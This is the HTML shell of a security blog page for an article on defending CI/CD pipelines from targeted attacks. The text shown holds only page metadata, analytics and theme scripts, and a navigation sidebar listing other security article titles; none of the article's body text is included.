<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-articles/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.10.1">
<title data-rh="true">The Invisible Pipeline: Defending CI/CD from Targeted Attacks | 1200km Security Research Articles</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://1200km.com/articles/read/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="keywords" content="Andrey Pautov blog, threat intelligence articles, CTI research, detection engineering articles, malware analysis, Medium security research, 1200km, InfoSec Write-ups, security blog"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="The Invisible Pipeline: Defending CI/CD from Targeted Attacks | 1200km Security Research Articles"><meta data-rh="true" name="description" content="How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them"><meta data-rh="true" property="og:description" content="How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them"><meta data-rh="true" property="og:image" content="https://cdn-images-1.medium.com/max/800/1*CEihhwPyac_RsY7p_uSmLA.jpeg"><meta data-rh="true" name="twitter:image" content="https://cdn-images-1.medium.com/max/800/1*CEihhwPyac_RsY7p_uSmLA.jpeg"><link data-rh="true" rel="icon" href="/medium-blog-navigation/img/favicon.svg"><link data-rh="true" rel="canonical" href="https://1200km.com/articles/read/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3"><link data-rh="true" rel="alternate" href="https://1200km.com/medium-blog-navigation/docs/articles/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3" hreflang="en"><link data-rh="true" rel="alternate" href="https://1200km.com/medium-blog-navigation/docs/articles/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Articles","item":"https://1200km.com/medium-blog-navigation/docs/articles/"},{"@type":"ListItem","position":2,"name":"The Invisible Pipeline: Defending CI/CD from Targeted Attacks","item":"https://1200km.com/medium-blog-navigation/docs/articles/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3"}]}</script><link rel="preconnect" href="https://www.google-analytics.com">
<link rel="preconnect" href="https://www.googletagmanager.com">
<script async src="https://www.googletagmanager.com/gtag/js?id=G-TMTG21RVHM"></script>
<script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-TMTG21RVHM",{anonymize_ip:!0})</script>



<script src="https://1200km.com/assets/docusaurus-ecosystem.js?v=20260614-3" defer="defer"></script><link rel="stylesheet" href="/medium-blog-navigation/assets/css/styles.592295e9.css">
<script src="/medium-blog-navigation/assets/js/runtime~main.00d81894.js" defer="defer"></script>
<script src="/medium-blog-navigation/assets/js/main.64e19f4f.js" defer="defer"></script>
<meta name="robots" content="noindex,follow">
</head>
<body>
<svg style="display: none;"><defs>
<symbol id="theme-svg-external-link" viewBox="0 0 24 24"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||(window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light")),document.documentElement.setAttribute("data-theme-choice",t||"system")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}(),document.documentElement.setAttribute("data-announcement-bar-initially-dismissed",function(){try{return"true"===localStorage.getItem("docusaurus.announcement.dismiss")}catch(t){}return!1}())</script><div id="__docusaurus"><link rel="preload" as="image" href="/medium-blog-navigation/img/logo.svg"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><div class="theme-announcement-bar announcementBar_mb4j" style="background-color:#0f62fe;color:#ffffff" role="banner"><div class="content_knG7 announcementBarContent_xLdY">The canonical article archive now lives at <a href="https://1200km.com/articles/">1200km.com/articles/</a>.</div></div><nav aria-label="Main" class="theme-layout-navbar navbar navbar--fixed-top"><div class="navbar__inner"><div class="theme-layout-navbar-left navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/medium-blog-navigation/"><div class="navbar__logo"><img src="/medium-blog-navigation/img/logo.svg" alt="1200km" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/medium-blog-navigation/img/logo.svg" alt="1200km" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">Blog Navigator</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/medium-blog-navigation/">Navigator</a><a class="navbar__item navbar__link" href="/medium-blog-navigation/docs/analysis">Analysis</a><a class="navbar__item navbar__link" href="/medium-blog-navigation/docs/reading-paths">Reading Paths</a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/medium-blog-navigation/docs/articles">Articles</a><a class="navbar__item navbar__link" href="/medium-blog-navigation/docs/labs">Labs</a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">Projects</a><ul class="dropdown__menu"><li><a href="https://1200km.com/cti-analyst-field-manual/" target="_blank" rel="noopener noreferrer" class="dropdown__link">CTI Analyst Field Manual<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/CTI_as_a_Code/" target="_blank" rel="noopener noreferrer" class="dropdown__link">CTI as a Code<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/operation-desert-hydra/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Operation Desert Hydra<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/customer-driven-ai-cti-project/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Customer-Driven AI CTI<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/israel-government-threat-actors-cti/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Israel Threat Actors CTI<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/ai-vs-defense/" target="_blank" rel="noopener noreferrer" class="dropdown__link">AI vs Defense<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://github.com/0x4m4/hexstrike-ai" target="_blank" rel="noopener noreferrer" class="dropdown__link">HexStrike AI<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li><a href="https://1200km.com/adversarygraph-docs/" target="_blank" rel="noopener noreferrer" class="dropdown__link">AdversaryGraph Docs<svg width="12" height="12" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div><a href="https://medium.com/@1200km" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">Medium<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><a href="https://github.com/anpa1200" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><a href="https://1200km.com/" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link navbar-portfolio-btn">Main Page<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="system mode" aria-label="Switch between dark and light mode (currently system mode)"><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP systemToggleIcon_QzmC"><path fill="currentColor" d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="theme-layout-main main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG menuWithAnnouncementBar_GW3s"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/medium-blog-navigation/docs/analysis"><span title="Blog Analysis" class="linkLabel_WmDU">Blog Analysis</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/medium-blog-navigation/docs/reading-paths"><span title="Reading Paths" class="linkLabel_WmDU">Reading Paths</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item sidebar-all-articles-button"><a class="menu__link" href="/medium-blog-navigation/docs/articles/"><span title="All Articles" class="linkLabel_WmDU">All Articles</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--active" href="/medium-blog-navigation/docs/articles/"><span title="Articles" class="categoryLinkLabel_W154">Articles</span></a><button aria-label="Collapse sidebar category &#x27;Articles&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/articles/2024/2024-10-17-wifi-cracking-with-aircrack-ng-d51cf98c789f"><span title="2024" class="categoryLinkLabel_W154">2024</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-02-24-soc-tier-1-the-complete-onboarding-guide-to-security-monitoring-and-incident-response-824a1dfe4476"><span title="2025" class="categoryLinkLabel_W154">2025</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-02-24-soc-tier-1-the-complete-onboarding-guide-to-security-monitoring-and-incident-response-824a1dfe4476"><span title="SOC Tier 1: The Complete Onboarding Guide to Security Monitoring and Incident Response" class="linkLabel_WmDU">SOC Tier 1: The Complete Onboarding Guide to Security Monitoring and Incident Response</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-03-14-authenticator-exe-dearsteeler-0c1d69767939"><span title="Authenticator.exe/DearSteeler" class="linkLabel_WmDU">Authenticator.exe/DearSteeler</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-03-24-spw-aw25-po-010-sms-exe-exe-agenttesla-767fbc920295"><span title="SPW AW25 — PO.010 SMS.exe.exe (AgentTesla)" class="linkLabel_WmDU">SPW AW25 — PO.010 SMS.exe.exe (AgentTesla)</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-03-29-static-malware-analysis-strings-analysis-e876640cfdb0"><span title="Static Malware Analysis. Strings analysis." class="linkLabel_WmDU">Static Malware Analysis. Strings analysis.</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-03-30-static-malware-analysis-obfuscation-51de3992065d"><span title="Static Malware Analysis . Obfuscation." class="linkLabel_WmDU">Static Malware Analysis . Obfuscation.</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-04-01-static-malware-analysis-file-fingerprinting-3ddf9bdd7864"><span title="Static Malware Analysis. File Fingerprinting" class="linkLabel_WmDU">Static Malware Analysis. File Fingerprinting</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-04-17-deep-dive-automating-static-malware-analysis-with-three-python-tools-46a26c0a7f87"><span title="Deep Dive: Automating Static Malware Analysis with Three Python Tools" class="linkLabel_WmDU">Deep Dive: Automating Static Malware Analysis with Three Python Tools</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-06-17-tools-by-mitre-att-and-ck-guide-77c4d947ba36"><span title="Tools by MITRE ATT&amp;CK Guide" class="linkLabel_WmDU">Tools by MITRE ATT&amp;CK Guide</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-08-fluent-bit-on-aws-eks-centralized-kubernetes-log-shipping-to-xplg-78811b8db55f"><span title="Fluent Bit on AWS-EKS: Centralized Kubernetes Log Shipping to XPLG" class="linkLabel_WmDU">Fluent Bit on AWS-EKS: Centralized Kubernetes Log Shipping to XPLG</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-09-threat-hunting-with-the-pyramid-of-pain-8add3cedb380"><span title="Threat Hunting with the Pyramid of Pain" class="linkLabel_WmDU">Threat Hunting with the Pyramid of Pain</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-11-fluentbit-on-kubernetes-demonset-deployment-13c3915113ba"><span title="FluentBit on Kubernetes DemonSet Deployment." class="linkLabel_WmDU">FluentBit on Kubernetes DemonSet Deployment.</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-11-sending-eks-control-plane-logs-via-aws-lambda-c4ce0cf84c5b"><span title="Sending EKS Control Plane Logs via AWS Lambda" class="linkLabel_WmDU">Sending EKS Control Plane Logs via AWS Lambda</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-20-cyberattacks-on-4g-lte-telecom-networks-threat-mapping-and-defense-bd0e7fe76f54"><span title="Cyberattacks on 4G/LTE Telecom Networks: Threat Mapping and Defense" class="linkLabel_WmDU">Cyberattacks on 4G/LTE Telecom Networks: Threat Mapping and Defense</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-20-cyberattacks-on-5g-telecom-networks-threat-mapping-and-defense-aa74f680a7df"><span title="Cyberattacks on 5G Telecom Networks: Threat Mapping and Defense" class="linkLabel_WmDU">Cyberattacks on 5G Telecom Networks: Threat Mapping and Defense</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-25-information-security-awareness-principles-and-best-practices-for-employees-6e518eda752c"><span title="Information Security Awareness: Principles and Best Practices for Employees" class="linkLabel_WmDU">Information Security Awareness: Principles and Best Practices for Employees</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-25-phishing-email-awareness-protecting-employees-and-organizations-cf5bc57a0511"><span title="Phishing Email Awareness: Protecting Employees and Organizations" class="linkLabel_WmDU">Phishing Email Awareness: Protecting Employees and Organizations</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-07-27-quick-start-server-hardening-checklist-all-open-source-08e9887b9faa"><span title="Quick‑Start Server Hardening Checklist (all open‑source)" class="linkLabel_WmDU">Quick‑Start Server Hardening Checklist (all open‑source)</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-08-01-the-20x-employee-a-strategic-framework-for-unlocking-hyper-productivity-with-artificial-8f49cde95a25"><span title="The 20x Employee: A Strategic Framework for Unlocking Hyper-Productivity with Artificial…" class="linkLabel_WmDU">The 20x Employee: A Strategic Framework for Unlocking Hyper-Productivity with Artificial…</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-08-31-from-bugs-to-breaches-learning-secure-coding-through-the-owasp-top-10-21b425fafb83"><span title="From Bugs to Breaches: Learning Secure Coding Through the OWASP Top 10" class="linkLabel_WmDU">From Bugs to Breaches: Learning Secure Coding Through the OWASP Top 10</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-10-13-villager-the-ai-powered-penetration-testing-framework-8df10532e265"><span title="Villager: The AI-Powered Penetration Testing Framework" class="linkLabel_WmDU">Villager: The AI-Powered Penetration Testing Framework</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-10-14-the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3"><span title="The Invisible Pipeline: Defending CI/CD from Targeted Attacks" class="linkLabel_WmDU">The Invisible Pipeline: Defending CI/CD from Targeted Attacks</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-10-18-automating-a-safe-dvwa-lab-with-ansible-build-a-reproducible-vulnerable-environment-for-tr-026d74697c4a"><span title="Automating a Safe DVWA Lab with Ansible: Build a Reproducible Vulnerable Environment for Training…" class="linkLabel_WmDU">Automating a Safe DVWA Lab with Ansible: Build a Reproducible Vulnerable Environment for Training…</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-10-19-augmenting-digital-forensics-with-ai-how-chatgpt-transforms-investigation-workflows-34eb10887ea5"><span title="Augmenting Digital Forensics with AI: How ChatGPT Transforms Investigation Workflows" class="linkLabel_WmDU">Augmenting Digital Forensics with AI: How ChatGPT Transforms Investigation Workflows</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-10-20-meet-syscheck-beauty-a-colorful-linux-system-report-with-deep-storage-insights-and-exporta-a38329dfe085"><span title="Meet syscheck_beauty: a colorful Linux system report with deep storage insights (and exportable…" class="linkLabel_WmDU">Meet syscheck_beauty: a colorful Linux system report with deep storage insights (and exportable…</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-01-the-atomic-standard-a-practitioner-s-compendium-for-single-event-threat-detection-570c4241d4d9"><span title="The Atomic Standard: A Practitioner’s Compendium for Single-Event Threat Detection" class="linkLabel_WmDU">The Atomic Standard: A Practitioner’s Compendium for Single-Event Threat Detection</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-02-deploying-fluent-bit-as-a-windows-service-for-centralized-log-forwarding-baec55b8aaf8"><span title="Deploying Fluent Bit as a Windows Service for Centralized Log Forwarding" class="linkLabel_WmDU">Deploying Fluent Bit as a Windows Service for Centralized Log Forwarding</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-07-cloud-native-security-threats-attacks-and-detection-strategies-55b3dd6ea2d1"><span title="Cloud-Native Security Threats, Attacks, and Detection Strategies" class="linkLabel_WmDU">Cloud-Native Security Threats, Attacks, and Detection Strategies</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-23-spiderfoot-deep-dive-installation-scans-and-practical-use-cases-11ea6537ad6f"><span title="SpiderFoot Deep Dive: Installation, Scans, and Practical Use Cases" class="linkLabel_WmDU">SpiderFoot Deep Dive: Installation, Scans, and Practical Use Cases</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-24-reinventing-recon-nmap-meets-chatgpt-e2acb6130be5"><span title="Reinventing Recon: Nmap Meets ChatGPT" class="linkLabel_WmDU">Reinventing Recon: Nmap Meets ChatGPT</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-25-getting-more-from-burp-suite-with-llms-fdd03cec343d"><span title="Getting More from Burp Suite with LLMs" class="linkLabel_WmDU">Getting More from Burp Suite with LLMs</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-11-26-enhancing-penetration-testing-with-hackerai-step-by-step-guide-metasploitable-lab-b2ab2cdd4139"><span title="Enhancing Penetration Testing with HackerAI: Step-by-Step Guide (Metasploitable Lab)" class="linkLabel_WmDU">Enhancing Penetration Testing with HackerAI: Step-by-Step Guide (Metasploitable Lab)</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-01-single-event-detection-rules-in-cybersecurity-aa7498f665bd"><span title="Single-Event Detection Rules in Cybersecurity" class="linkLabel_WmDU">Single-Event Detection Rules in Cybersecurity</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-02-correlation-based-detection-rules-in-cybersecurity-from-atomic-events-to-behavioral-insigh-1b3df31597bb"><span title="Correlation-Based Detection Rules in Cybersecurity: From Atomic Events to Behavioral Insight" class="linkLabel_WmDU">Correlation-Based Detection Rules in Cybersecurity: From Atomic Events to Behavioral Insight</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-12-protocol-level-network-threat-hunting-a-wireshark-centric-guide-a6770ffc96c6"><span title="Protocol-Level Network Threat Hunting: A Wireshark-Centric Guide" class="linkLabel_WmDU">Protocol-Level Network Threat Hunting: A Wireshark-Centric Guide</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-14-endpoint-threat-hunting-proactive-detection-on-windows-linux-and-macos-f892d9b8a113"><span title="Endpoint Threat Hunting: Proactive Detection on Windows, Linux, and macOS" class="linkLabel_WmDU">Endpoint Threat Hunting: Proactive Detection on Windows, Linux, and macOS</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-18-hexstrike-ai-install-configure-and-run-mcp-with-gemini-openai-cursor-llama-85a0e5752949"><span title="HexStrike AI: Install, Configure, and Run MCP with Gemini, OpenAI, Cursor, Llama" class="linkLabel_WmDU">HexStrike AI: Install, Configure, and Run MCP with Gemini, OpenAI, Cursor, Llama</span></a></li><li 